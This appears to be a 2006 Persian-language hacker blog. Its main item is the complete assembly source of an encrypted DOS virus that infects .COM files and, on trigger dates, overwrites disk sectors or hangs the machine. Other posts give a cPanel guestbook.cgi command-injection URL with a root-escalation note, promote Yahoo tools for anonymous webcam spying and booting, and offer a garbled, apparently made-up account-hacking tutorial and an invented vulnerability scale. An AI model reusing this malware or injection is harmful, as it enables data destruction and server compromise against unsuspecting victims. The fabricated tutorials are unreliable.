تبليغاتX
وبلاگ معروف سربندر هکر بوی






سلام دوستان خوبم وبلاگ یه مدت آپ نمیشه چون داریم وب جدید رو طراحی می کنیم

که اسمش هست http://www.yahoo110.persiangig.com

امید وارم که از این وبلاگ نهایت استفاده را بر ده باشید  ......

اگر کسی دوست داره  تا سقف ۵۱۲ هزار تومان در روز پول در بیاره یه سری به این وبلاگ بزنه

که متعلق به یکی از اعضایه  گروه  sarbandar hacker boy است .....

به نعفتونه

http://www.sunjava111.blogfa.com

متشکرم بای


نویسنده: سربندر هکر بوی | مورخ: 2006/5/12 | ساعت: 9:30 PM | + |

عالیه

 

 

 

www.Bigoo.ws www.Bigoo.ws www.Bigoo.ws www.Bigoo.ws  www.Bigoo.ws



Y! Intai
« نرم افزاری کاربردی برای یاهو مسنجر »
این نرم افزار دارای قابلیت های فراوانی از قبیل :


- چک کردن وضعیت افراد در یاهو مسنجر ( Offline OR Online )
- - Add کردن بدون اجازه
- مشاهده وبکم دیگران به صورت Anonymous
- بوت کردن
- ...


را داراست!!

دانلود برنامه


نویسنده: سربندر هکر بوی | مورخ: 2006/5/2 | ساعت: 10:1 PM | + |

یاهو

 

این برنامه برای فرستادن اشکال زیبا و عشقی در یاهو به کار میرود دانلود کنید  و حالشو ببرید نظر هم یادتون نره

راستی حجمشم کمه زود دانلود میشه موفق باشید.

 

Download eyeHeart now     


نویسنده: سربندر هکر بوی | مورخ: 2006/5/2 | ساعت: 9:45 PM | + |

اینم یه ویروس جدید

 

; had multiple programming errors in it that kept it from replicating.
; My version is much more successful.
;


page 255,80
code segment word public 'code'
assume cs:code,ds:code
org 100h
main proc;edure


;EQUates...
idc equ 69h ;ID character - (note: 69)
cr equ 13 ;ASCII for carriage return
lf equ 10 ;ASCII for line feed

;End codes. These determine what happens after the string is displayed.

terminate equ 0 ;Terminate program after display
halt equ 1 ;Cause the system to hang after display
SimulateCritErr equ 2 ;Simulate the critical error handler
return2host equ 3 ;Resume program immediately
FlashFloppy equ 4 ;Wait for a key, then reset Drive A:
WaitKey equ 5 ;Wait for a key, then resume program
PauseKey equ 6 ;Same thing, but uses a pause message
StackError equ 7 ;Cause a stack overflow (halts system)


tof: ;Top-Of-File
jmp begin ;Skip over program
idchar: db idc ;ID character

HostProgram: nop ;First run copy only!
nop ;First run copy only!

first_four: nop ;First run copy only!
address: int 20h ;First run copy only!
check: nop ;First run copy only!

begin: call nextline ;Push IP+3 onto stack
nextline: pop bp ;mov bp,ip
sub bp,offset nextline ;bp=disp. for mem locs

push ax ;Save AX
call cryptor ;Decrypt
jmp short retloc ;Continue program

cryptor: mov al,[bp+offset encrypt_val] ;encrypt val
lea si,[bp+offset toec] ;Top Of Encrypted Code
mov cx,offset eoec-offset toec ;Length of " "
cryptorloop: xor [si],al ;en/de crypt
rol al,cl ;change code #
inc si ;Next char please!
loop cryptorloop ;loop if necessary
ret ;Return to caller

infect: call cryptor ;Encrypt code
pop cx ;Restore CX for INT 21
int 21h ;Call DOS
call cryptor ;Decrypt code
ret ;Go back

toec:;???????????????????????????????????????????????????Top Of Encrypted Code
InfectIt: push cx ;Save CX for sub
jmp infect

retloc: pop ax ;Restore AX
xor di,di ;DI = 0

cli ;Disable interrupts
mov ss,di ;Set up stack at:
mov sp,2F0h ; 0000:02F0
sti ;Enable interrupts

mov si,96h ;Vector for INT 24h
mov bx,ss:[si] ;BX = offset in segment
mov cx,ss:[si+2] ;CX = segment
lea dx,[bp+offset int24handler] ;CS:DX -} local handler
mov ss:[si],DX ;Save offset
mov ss:[si+2],cs ;Save segment
mov si,es:[di+2F8h] ;Check operation mode
cmp si,4643h ;'CF' if already TSRed
jne GoOn ;Nope, jmp
jmp return ;Yes, don't do anything

GoOn: mov cs:[di+4Ch],bx ;use unused part of PSP
mov cs:[di+4Eh],cx ; to save BX and CX
push cs ;Copy CS ...
pop es ; ... to DS

mov byte ptr [bp+offset infected],0 ;Reset infection count
mov byte ptr [bp+offset max2kill],3 ;Stop after 3 or less

GoOn2: lea si,[bp+offset first_four] ;Original first 4 bytes
mov di,offset tof ;TOF never changes
cld ;Read left-to-right
movsw ;Copy the 4 bytes
movsw ;Copy the 4 bytes

mov ah,1Ah ;Set DTA address ...
lea dx,[bp+offset DTA] ; ... to *our* DTA
int 21h ;Call DOS to set DTA

mov ah,4Eh ;Find First ASCIIZ
lea dx,[bp+offset filespec] ;DS:DX -} '*.COM',0
lea si,[bp+offset filename] ;Point to file
push dx ;Save DX
jmp short continue ;Continue...

return: mov ah,1ah ;Set DTA address ...
mov dx,80h ; ... to default DTA
int 21h ;Call DOS to set DTA
xor di,di ;DI= 0
mov es,di ;ES= 0
mov si,96h ;Vector for INT 24h
mov bx, cs:[di+4Ch] ;Restore from saved BX
mov word ptr es:[si+0], bx ;Place back into vector
mov cx, cs:[di+4Eh] ;Restore from saved CX
mov word ptr es:[si+2], cx ;Place back into vector
push cs ;Move CS ...
pop es ; ... to ES

mov ax,[bp+offset SavedAX] ;Restore AX
xor bx,bx ;BX= 0
mov cx,bx ;CX= 0
mov dx,cx ;DX= 0
mov si,dx ;SI= 0
mov di,si ;DI= 0
mov sp,0FFFEh ;SP= FFFEh (normal)
mov bp,100h ;BP= 100h (RETurn addr)
push bp ; Put on stack
mov bp,ax ;BP= 0
ret ;JMP to 100h

nextfile: or bx,bx ;Did we open the file?
jz skipclose ;No, so don't close it
mov ah,3Eh ;Close file
int 21h ;Call DOS to close it
xor bx,bx ;Set BX back to 0
skipclose: mov ah,4Fh ;Find Next ASCIIZ

continue: pop dx ;Restore DX
push dx ;Re-save DX
xor cx,cx ;CX= 0
xor bx,bx
int 21h ;Find First/Next
jnc skipjmp
jmp NoneLeft ;Out of files

skipjmp: mov ax,3D02h ;open file
mov dx,si ;point to filespec
int 21h ;Call DOS to open file
jc nextfile ;Next file if error

mov bx,ax ;get the handle
mov ah,3Fh ;Read from file
mov cx,4 ;Read 4 bytes
lea dx,[bp+offset first_four] ;Read in the first 4
int 21h ;Call DOS to read

cmp byte ptr [bp+offset check],idc ;Already infected?
je nextfile ;Yep, try again ...
;NOTE: Delete the two lines above if you want it to re-infected programs.

cmp byte ptr [bp+offset first_four],77 ;Mis-named .EXE?
je nextfile ;Yep, maybe next time!

mov ax,4202h ;LSeek to EOF
xor cx,cx ;CX= 0
xor dx,dx ;DX= 0
int 21h ;Call DOS to LSeek

cmp ah,0F8h ;Longer than 62K?
ja nextfile ;Yep, try again...
mov [bp+offset addr],ax ;Save call location

mov ah,40h ;Write to file
mov cx,4 ;Write 4 bytes
lea dx,[bp+offset first_four] ;Point to buffer
int 21h ;Save the first 4 bytes

mov ah,[bp+offset encrypt_val] ;Get code number
inc ah ;add 1
adc ah,0 ;increment if it's zero
mov [bp+offset encrypt_val],ah ;Save new code number

mov ah,40h ;Write to file
mov cx,offset eof-offset begin ;Length of target code
lea dx,[bp+offset begin] ;Point to virus start
call InfectIt ;Exempt from encryption
ComeBackHere: mov ax,4200h ;LSeek to TOF
xor cx,cx ;CX= 0
xor dx,dx ;DX= 0
int 21h ;Call DOS to LSeek

mov ax,[bp+offset addr] ;Retrieve location
inc ax ;Adjust location

mov [bp+offset address],ax ;address to call
mov byte ptr [bp+offset first_four],0E9h ;JMP rel16 inst.
mov byte ptr [bp+offset check],idc ;EOFMARK

mov ah,40h ;Write to file
mov cx,4 ;Write 4 bytes
lea dx,[bp+offset first_four] ;4 bytes are at [DX]
int 21h ;Write to file

inc byte ptr [bp+offset infected] ;increment counter
dec byte ptr [bp+offset max2kill] ;decrement counter
jz TheEnd ;If 0 then End

inc byte ptr [bp+offset encrypt_val] ;change code #
adc byte ptr [bp+offset encrypt_val],0 ;adjust if 0
jmp nextfile ;Next victim!

NoneLeft: cmp byte ptr [bp+offset infected],3 ;At least 3 infected?
jae TheEnd ;The party's over!

mov di,100h ;DI= 100h
cmp word ptr [di],20CDh ;an INT 20h?
je TheEnd ;Don't go to prev. dir.

lea dx,[bp+offset prevdir] ;'..'
mov ah,3Bh ;Set current directory
int 21h ;CHDIR ..
jc TheEnd ;We're through!
mov ah,4Eh
jmp continue ;Start over in new dir

TheEnd: xor di,di ;DI= 0
mov es,di ;ES= 0
mov ah,2ah ;Get date
int 21h ;Do it
cmp dl,4 ;4th of the month?
jne test2 ;Nope, second test
cmp dh,7 ;July?
jne test2 ;Nope, second test
xor ax,ax ;Sector 0
jmp Kill ;Kill the disk now...

test2: mov ah,2ch ;Get time
int 21h ;Do it
or cl,cl ;On the hour? (x:00 xM)
jnz GiveUp ;Return to program
cmp ch,6 ;Midnight to 5 AM ???
jnl GiveUp ;Return to program
add cl,ch ;Add first number
mov ax,cx ;Transfer to AX
cbw ;Zero out AH
add al,dh ;Add DL to AL
adc al,dl ;Add DL and carry flag
adc ah,0 ;Add carry to AH
or ax,ax ;AX = 0 ???
jnz Kill ;Kill the disk now...
inc ax ;Well, adjust first...

Kill: mov dx,ax ;Sector number
mov cx,1 ;One at a time....
xor bx,bx ;Point at PSP
mov ah,19h ;Get current disk
int 21h ;Call DOS to ^
int 26h ;Now kill the disk

GiveUp: mov bx,offset message_table ;point to table

mov ah,2ch ;Get time
int 21h ;Call DOS to ^
inc dh ;(0-59)

timeloop: cmp dh,msgs ;mapped yet?
jl timedone ;Yes, jump
sub dh,msgs ;try to map it
jmp short timeloop ;and check out work

timedone: mov al,dh ;AL gets msg #
mov cl,al ;Save in CL for CritErr
cbw ;AH gets 0
shl ax,1 ;AX = AX * 2
add bx,ax ;BX = index
mov si,[bx] ;SI points to string
mov ch,[si-1] ;CH is technique #
mov dx,si ;DX points to string

mov ah,9 ;Display string
int 21h ;Call DOS to ^

cmp ch,terminate ;Terminate program?
je TerminateProg ;Nope, next test

cmp ch,halt ;Halt program?
je $ ;Hang system if ch=halt

cmp ch,SimulateCritErr ;Simulate CritErr?
je simulate ;yes, go do it

cmp ch,Return2host ;Return to host?
je ResumeProgram ;yes, go do it

cmp ch,FlashFloppy ;Flash drive A:?
je FlashFlop ;Yes, go do it

cmp ch,WaitKey ;Wait for keypress?
je zwait ;Yes, go do it

cmp ch,PauseKey ;Pause message w/ wait?
je zpause ;Yes, go do it

cmp ch,StackError ;Stack overflow?
je StackErr ;Yes, go do it

;Invalid code, assume Return2host

ResumeProgram: jmp return ;Return to caller
StackErr: call $ ;Cause stack overflow
TerminateProg: int 20h ;Yep, all done!

simulate: lea dx,[bp+offset ARIFmsg] ;Abort, Retry ...
mov ah,9 ;Print string
int 21h ;Call DOS to ^

mov ah,1 ;Input a char
int 21h ;Call DOS to ^

lea dx,[bp+offset crlf] ;crlf
mov ah,9 ;Print string
int 21h ;Call DOS to ^

cmp al,'a' ;Uppercase?
jb uppercase ;Nope, jump
sub al,' ' ;Yes, make uppercase

uppercase: cmp al,'A' ;Abort?
je terminateprog ;Yep, go do it.

cmp al,'R' ;Retry?
jne zskip ;skip over "retry" code

lea dx,[bp+offset crlf] ;Point to crlf
mov ah,9 ;Print string
int 21h ;Call DOS to ^
mov dh,cl ;Restore DH from CL
jmp timedone ;Reprint error

zskip: cmp al,'I' ;Ignore?
je ResumeProgram ;Return to host program
cmp al,'F' ;Fail?
jne simulate ;Invalid response

lea dx,[bp+offset fail24] ;Point to fail string
mov ah,9 ;Print string
int 21h ;Call DOS to ^
int 20h ;Terminate program

FlashFlop: mov ah,1 ;Wait for keypress
int 21h ;Call DOS to ^

xor ax,ax ;Drive A:
mov cx,1 ;Read 1 sector
mov dx,ax ;Start at boot sector
lea bx,[bp+offset boot_sector] ;BX points to buffer
int 25h ;Flash light on A:
jmp short ResumeProgram ;Resume if no error

zpause: lea dx,[bp+offset pause] ;Point to pause message
mov ah,9 ;Print string
int 21h ;Call DOS to ^
zwait:
mov ah,1 ;Wait for keypress
int 21h ;Call DOS to ^
jmp short ResumeProgram ;Go on...



ARIFmsg db cr,lf,'Abort, Retry, Ignore, Fail?$'
fail24 db cr,lf,cr,lf,'Fail on INT 24'
crlf db cr,lf,'$'

message_table:
dw offset msg1
dw offset msg2
dw offset msg3
dw offset msg4
dw offset msg5
dw offset msg6
dw offset msg7
dw offset msg8
dw offset msg9
dw offset msg10
dw offset msg11
dw offset msg12
dw offset msg13
dw offset msg14
dw offset msg15
dw offset msg16
dw offset msg17
dw offset msg18
dw offset msg19
dw offset msg20

msgs db 20

; I tried to make it as simple as possible to change the messages
; and add/delete them. Each message is in the format:
;
; db [technique]
;[label] db [Text]
;
; Where [technique] is one of the 8 codes shown at the beginning of
; this file (terminate, halt, etc.). This determines what the virus
; should do after printing the message.
; [label] is in the form "msg##" where ## is a number from 1 to
; "msgs". "msgs" is defined immediately before this
; comment block.
; [text] is a combination of text and ASCII codes, terminated by
; either a '$' or a ,36.
;
; If you change the number of messages the virus has, you should also
; add/remove lines from the offset table and change the "msgs"
; data byte appropriately. Let's say for instance that you want
; to remove "Program too big to fit in memory.":
; 1) Delete the line(s) with the message and the line
; immediately before it.
; 2) Move message #20 up to message #2's position and
; change its label from "msg20" to "msg2".
; 3) Delete the line "dw offset msg20" from the offset
; table.
; 4) Change the line before this comment block to:
; "msgs db 19"
;
; Later!
; -The BOOT SECTOR Infector ...
;

db FlashFloppy ;Waits for key, then flashes drive A:
msg5 db 'I',39,'m hungry! Insert PIZZA & BEER into drive A: and',cr,lf
pause db 'Strike any key when ready... $'

db SimulateCritErr ;Prints ARIF message and responds appropriately
msg1 db 'Impotence error reading user',39,'s dick$'

db terminate ;Ends the program immediately
msg2 db 'Program too big to fit in memory',cr,lf,'$'

db halt ;Halts the system
msg3 db 'Cannot load COMMAND, system halted',cr,lf,'$'

db terminate ;Ends the program immediately
msg4 db 'I',39,'m sorry, Dave.... but I',39,'m afraid'
db ' I can',39,'t do that!',cr,lf,'$'

db WaitKey ;Waits for a keypress, then runs the program
msg6 db 'Format another? (Y/N)? $'

db StackError ;Generates a stack overflow (halts the system)
msg7 db 'Damn it! I told you not to touch that!$'

db terminate ;Ends the program immediately
msg8 db 'Suck me!',cr,lf,'$'

db SimulateCritErr ;Prints ARIF message and responds appropriately
msg9 db 'Cocksucker At Keyboard error reading device CON:$'

db terminate ;Ends the program immediately
msg10 db 7,cr,cr,cr,7,cr,cr,cr,7,cr,cr,cr,lf
db 'I',39,'m sorry, but your call cannot be completed as dialed.'
db cr,lf,'Please hang up & try your call again.',cr,lf,'$'

db terminate ;Ends the program immediately
msg11 db 'No!',cr,lf,cr,lf,'$'

db halt ;Halts the system
msg12 db 'Panic kernal mode interrupt$'

db WaitKey ;Waits for a keypress, then runs the program
msg13 db 'CONNECT 1200«',cr,lf,cr,lf,'$'

db return2host ;Runs host program immediately
msg14 db 'Okay, okay! Be patient! ...',cr,lf,'$'

db terminate ;Ends the program immediately
msg15 db 'And if I refuse?',cr,lf,'$'

db return2host ;Runs host program immediately
msg16 db 'Fuck the world and its followers!',cr,lf,'$'

db return2host ;Runs host program immediately
msg17 db 'You are pathetic, man... you know that?',cr,lf,'$'

db terminate ;Ends the program immediately
msg18 db 'Cum on! Talk DIRTY to me !!!',cr,lf,'$'

db terminate ;Ends the program immediately
msg19 db 'Your coprocessor wears floppy disks!',cr,lf,'$'

db PauseKey ;Waits for keypress (SAKWR), then runs host prg
msg20 db 'Joker! ver àà by TBSI!',cr,lf
db 'Remember! EVERYTHING',39,'s bigger in Texas!',cr,lf,'$'

int24handler: xor al,al ;Ignore the error
iret ;Interrupt return


filespec: db '*.COM',0 ;File specification
prevdir: db '..',0 ;previous directory
max2kill db 3 ;max. files to infect

eoec:;???????????????????????????????????????????????????End Of Encrypted Code
VersionNumber dw 100h ;Version 1.00
encrypt_val db 0 ;1st-run copy only

; None of this information is included in the virus's code. It is only used
; during the search/infect routines and it is not necessary to preserve it
; in between calls to them.

eof:
DTA:

db 21 dup (?) ;internal search's data
attribute db ? ;attribute
file_time db 2 dup (?) ;file's time stamp
file_date db 2 dup (?) ;file's date stamp
file_size db 4 dup (?) ;file's size
filename db 13 dup (?) ;filename

SavedAX dw ? ;Used to save AX
infected db ? ;infection count
addr dw ? ;Address

boot_sector:

main endp;rocedure
code ends;egment

end

نویسنده: سربندر هکر بوی | مورخ: 2006/5/2 | ساعت: 9:34 PM | + |

هك كردن Cpanel 5 و راههايي براي فيكس كردن باگها

Cpanel يك وب هاستينگ كنترل هست كه به شما اجازه ميده از طريق Client به كنترل هاستيگ خود بپردازيد .
باگهاي موجود بر روي ورژن 5 اين سرويس به شرح زير است :
Remote command Execution in guestbook.cgi
با استفاده از باگي كه بر روي اين قسمت وجود دارد شما ميتونيد يصورت زير تمامي دستورات دلخواه خودتون را اجرا كنيد :
[url]http://[your[/url] site.com]/cgi-sys/guestbook.cgi?user=cpanel&template=|[command]|

Local privileges escalation (root)
اين اكسپلويت مربوط به Webmail ميباشد و اكسپلويت آن نيز بنام openwebmail-shared.pl موجود مياشد اين باگ در اين قسمت وجود دارد :
/usr/local/cpanel/base/openwebmail/oom
در لاين 14
if ( $ENV{'SCRIPT_FILENAME'} =~ m!^(.*?)/[wd-]+.pl! || $0 =~ m!^(.*?)/[wd-]+.pl! ) { $SCRIPT_DIR=$1; }
if (!$SCRIPT_DIR) { print "Content-type: text/htmlnn$SCRIPT_DIR not set in CGI script!n"; exit 0; }
push (@INC, $SCRIPT_DIR, ".");
.
راه حل :
براي حل اين مشكلات 2 كار را امجام دهيد :
1.اين قسمت را بطور كل پاك كنيد /usr/local/cpanel/cgi-sys/guestbook.cgi
2.خاصيت suid را در اين قسمت غير فعال كنيد

hmod 755 /usr/local/cpanelchmod 755 /usr/local/cpanel/base/openwebmail/oom /base/openwebmail/oom


نویسنده: سربندر هکر بوی | مورخ: 2006/5/2 | ساعت: 9:21 PM | + |

باگ های و حفره های امنیتی چیستند ؟

با سلام خدمت تمامی دوستان و بازدیدکنندگان محترم .

معذرت می خوام از شما که نتونستم زود آپدیت کنم و اما یک مطلب

مهم :

یکی از دوستان  به من گفت که برای من یک برنامه باید کرک کنی

من هم چون باهاش صمیمی بودم این کار رو قبول کردم .. اما موقعی که داشت

فایل رو می فرستاد دیدم حجم فایل 3.5kb بود .

می خواستم اینو بهتون بگم که عزیزان من همیشه موقعی که می خواین

یکی رو با تروجان های مختلف هک کنید یک ذره فکر کنید و ابتکار به خرج بدید

نه این که مثل این ادم خنگ ...

خب دیگه زیادی چرت و پرت گفتیم بهتره بریم سر مطلب امروزمون :

قصد دارم شما دوستان رو امروز تا مقداری با حفره های امنیتی و باگ ها

آشنا کنم .

باگ ها و حفره های امنیتی به اصطلاح ما هکر ها Hole هایی هستند که بر روی سرور

بی درو پیکر موندن .

مثلا توی یک سایت می بینین که یک برنامه ( مانند : نظرسنجی , خبرنامه و ...  )

خود مدیر طراحی کرده و توی سایت روی سرور اصلی گذاشته .

خب حالا اگر این برنامه کامل و بدون اشکال طراحی نشده باشد شما می توانید

با استفاده از Hole هایی که بر روی این برنامه که اکثرا با پسوند net. نوشته

می شوند باز است به سروری که این برنامه روی اون آپلود شده

نفوذ کنید . (( بستگی به HOLE هایی که روی اون سرور هستش داره ))

در این حالت شما می توانید بگویید که از باگ ها و حفره های امنیتی اون برنامه وب

استفاده کردید و به سایت نفوذ کردین .

این کار فقط به وب سایت ها و سرور ها مربوط نمی شوند .

مثلا اگر یکی یک فایروال داشته باشد که فایروال او دارای باگ یا همون حفره های امنیتی

باشد شما میتونید از اون باگ استفاده کنید و به سیستم طرف مقابل وصل شوید .

باگ ها و حفره های امنیتی بعضی مقدار نفوذ بالا و بعضی مقدار نفوذ کم دارند .

نکته :

  • به مقدار نفوذ پذیری باگ ها و حفره های امنیتی در زبان ما هکر ها Pring می گویند

برای مثال باگ موجود در فایروال ... 35 پرینگ است

بیشترین آسیب پذیری یا همان نفوذ پذیری باگ ها تا کنون یک باگ موجود در سرور های

Php-Nuke هستش که این باگ 998 پرینگ خاصیت آسیب پذیری دارد !

یعنی با استفاده از این باگ به راحتی می توان تمامی سایت های phpnuke را

تخریب کرد .

با تشکر ...

رضا اعظمی

 


نویسنده: سربندر هکر بوی | مورخ: 2006/5/2 | ساعت: 9:12 PM | + |

با سلام خدمت دوستان

 

دوستان عزیز  در حال ترمیم وبلاگ هستیم

 

 

سلام دوستان محترم و تمامی بازدیدکنندگان :

در کل می تونم بگم که حدود ۲۰۰ تا درخواست آموزش هک کردن آیدی داشتم دیگه کستین منو مجبورم بذارم.

آخه بابا یه سری احمق بیشعور میان این پست رو کپی می کنن و می ذارن تو وبلاگشون و  به اسم خودشون می زنن.

این چه کاریه.در ضمن حالا دارم این پست را می زنم تو وبلاگ نظر یادتون نره خواهشا ممنون می شم امید وارم استفاده کنین

و دیگه این قد هی نزنین هک آیدی یاد بده . نظر هم یادتون نره .

در واقع در این پست شما با نحوه هک کردن آیدی به صورت بسیار ساده با برنامه ای بسیار جدید آشنا می شوید

روش های هک کردن آیدی بسیار یاده تر از این هم با expliot وجود دارد اما دیگه شرمنده بعدشم هی همه به من میگن

بیا این آیدی رو واسه من هک کن آخه مگه یاهو کشکه یا اصلا سرور نداره آقا جان از همین الان دارم به کسانی که

هک کردن آیدی رو بلد نیستن تبریک میگم چون کار بسیار مفتی هستش و به نظر من یک هکر خوب باید کار با

تمامی پرت های و استفاده کردن از سوراخ های داخل پرت ها را یاد بگیرد نه این که به فکر هک کردن آیدی باشه شما اگه

هک کردن آیدی رو بلد نباشی اما این کار هایی رو که گفتم بلد باشی می تونی هم از هک شدن آیدیت جلو گیری کنی

هم اگز هم آیدیت هک شد به سرعت با نفوذ کردن سیستم هکر آیدیتونو پس بگیرین نه این که هک کنید .

شما به برنامه passware kit 7  نیاز دارید.

حالا بعد از باز کردن برنمه از منوی VICTUM  وارد گزینه engeniering technologiyeghs شوید و تمامی گزینه ها را طبق

آموزش های قبلی بلدید پر کنید فقط یک گزینه pistolz میباشد که مربوط به opreing system طرف میباشد.

حالا دکمه Find Password List را کلیک کنید و گزینه ای که با پسوند txt برنامه پیدا میکند را با زدن دکمه START 

تست کنید و در قسمت popers letgh راهنمایی اول به شما میشود یعنی به شما به زبان انگیلیسی در مورد

پسورد قربانی اطلاعاتی را میدهد حالا روی گزینه FIND password  کلیک کنید.

و در قسمت password بعد از منتظر ماندن در حدود ۳۰ دقیقه پسورد قربانی را مشاهده کنید یک راهنمای::

برای پیدا کردن لینک دانلود عبارت passware kit 7 + download را در گوکل سرچ کنید.

 

         
 
 

نویسنده: سربندر هکر بوی | مورخ: 2006/4/23 | ساعت: 10:12 PM | + |